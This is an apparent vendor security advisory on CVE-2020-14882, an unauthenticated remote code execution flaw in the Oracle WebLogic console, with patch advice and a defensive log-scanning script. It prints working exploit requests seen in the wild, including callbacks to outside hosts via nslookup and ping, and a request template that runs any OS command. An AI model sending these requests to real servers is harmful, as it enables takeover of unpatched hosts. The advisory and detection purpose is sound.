Oracle WebLogic Server Under Active Exploitation (CVE-2020-14882)

A critical Remote Code Execution (RCE) vulnerability, CVE-2020-14882, in the console component of Oracle WebLogic Server allows unauthenticated, remote attackers to execute commands on affected servers. Oracle has assigned it a CVSSv3 score of 9.8 out of 10, which reflects the vulnerability's criticality; it should be patched as soon as possible. Johannes B. Ullrich, dean of research at the SANS Technology Institute, said in his post that any Oracle WebLogic Server that has not been patched by now should be assumed to have been compromised.

The exploits appear to originate from a blog post (in Vietnamese) published by "Jang". In the post, he describes how the flaw can be exploited to achieve remote code execution with a single HTTP request.


Vulnerability Details

The RCE vulnerability exists in the console component of the WebLogic Server. It can be exploited by sending a crafted HTTP request and can lead to complete control of the host. Security researcher Jang included partial details of the flaw in his blog post, which can be used to build a PoC.

As discussed in the SANS ISC post, the exploits below are currently in use (the honeypot's IP has been replaced with AAA.BBB.CCC.DDD):

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c

GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \”java.lang.Runtime.getRuntime().exec( ‘nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net’)

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(\”test\”)

This pre-authentication vulnerability is given an attack complexity of "low" and is highlighted as "easily exploitable" by Oracle. Because of the low complexity, attackers require no user interaction and no privileges to exploit it.

A typical crafted HTTP request that exploits the vulnerability and executes "calc.exe" is given below:

http://<domain>/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runtime.getRuntime().exec(“calc.exe“);”);

In the above request, “calc.exe” can be replaced by any other OS command.

On successful exploitation of the vulnerability, "calc.exe" is executed on the affected host, as shown in the picture below.
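The requests above share one shape: a double-URL-encoded path traversal from /console/images/ back to console.portal, plus a handle= parameter that instantiates a class such as com.tangosol.coherence.mvel2.sh.ShellSession. As an added defender-side example (not code from the SANS ISC post, Jang's write-up, or SecPod), the Python script below scans web server access logs for that shape. The log lines are constructed for the example, and the Apache/NGINX combined log format, the indicator names, and the decoding depth are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined log format); the first two mimic the
# request shape discussed above, the last two are ordinary console traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Oct/2020:10:01:12 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1" 200 1024 "-" "python-requests/2.24"
203.0.113.9 - - [29/Oct/2020:10:01:13 +0000] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String(%22test%22) HTTP/1.1" 200 512 "-" "curl/7.68.0"
198.51.100.7 - - [29/Oct/2020:10:02:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.8 - - [29/Oct/2020:10:02:05 +0000] "GET /console/images/logo.png HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The traversal is encoded twice (%252E -> %2E -> '.'), so decode until stable.
def decode_fully(value, max_rounds=3):
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

# Split the raw query on '&' only (no ';' splitting, which would cut the handle value),
# keeping the first occurrence of each key and decoding the values afterwards.
def query_params(query):
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(key, decode_fully(value))
    return params

def classify_request(target):
    """Return indicator names (assumed labels) for one request target; empty if benign."""
    indicators = []
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    # Indicator: /console/images/ path that traverses back to console.portal.
    if re.search(r'/console/images/.*\.\./.*console\.portal', path, re.IGNORECASE):
        indicators.append('traversal_to_console_portal')
    handle = query_params(parts.query).get('handle', '')
    if handle:
        # Indicator: the MVEL ShellSession handle seen in the in-the-wild requests.
        if re.search(r'ShellSession\s*\(', handle):
            indicators.append('mvel_shellsession_handle')
        # Indicator: an OS command execution call embedded in the handle.
        if re.search(r'Runtime\.getRuntime\(\)\.exec', handle):
            indicators.append('runtime_exec_in_handle')
        # Indicator: any class instantiation in handle (e.g. java.lang.String("test") probes).
        if re.match(r'[A-Za-z_][\w.]*\s*\(', handle):
            indicators.append('class_instantiation_in_handle')
    return indicators

def scan_log(text):
    """Parse access-log text and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group('target'))
        if indicators:
            hits.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'status': int(m.group('status')),
                'target': m.group('target'),
                'indicators': indicators,
            })
    return hits

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], hit['status'], ', '.join(hit['indicators']))
        print('   ', hit['target'])
```

A flagged request with a 200 status does not by itself prove compromise, but combined with the SANS advice above it is a strong reason to treat the host as compromised until the patch level and the process list have been checked. The decoding step matters: matching the literal string "..%2F" or "../" in raw logs misses the double-encoded form used in the wild.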

Publicly available PoC

Proof-of-concept code for the vulnerability is publicly available:

  • Exploit PoC on Twitter.
  • Exploit PoC on Github.

Impact

This vulnerability allows an unauthenticated, remote attacker to execute commands and can be used to achieve complete control of the affected host.


Affected Oracle WebLogic Versions

  • 14.1.1.0.0
  • 12.2.1.4.0
  • 12.2.1.3.0
  • 12.1.3.0.0
  • 10.3.6.0.0

Solution

SanerNow security content has been published to detect this vulnerability. Oracle has already released a security update this month; the patches are available only to Oracle customers. Please download the patch from the Oracle portal and install it. SanerNow's software deployment capability can be used to install executables and scripts.
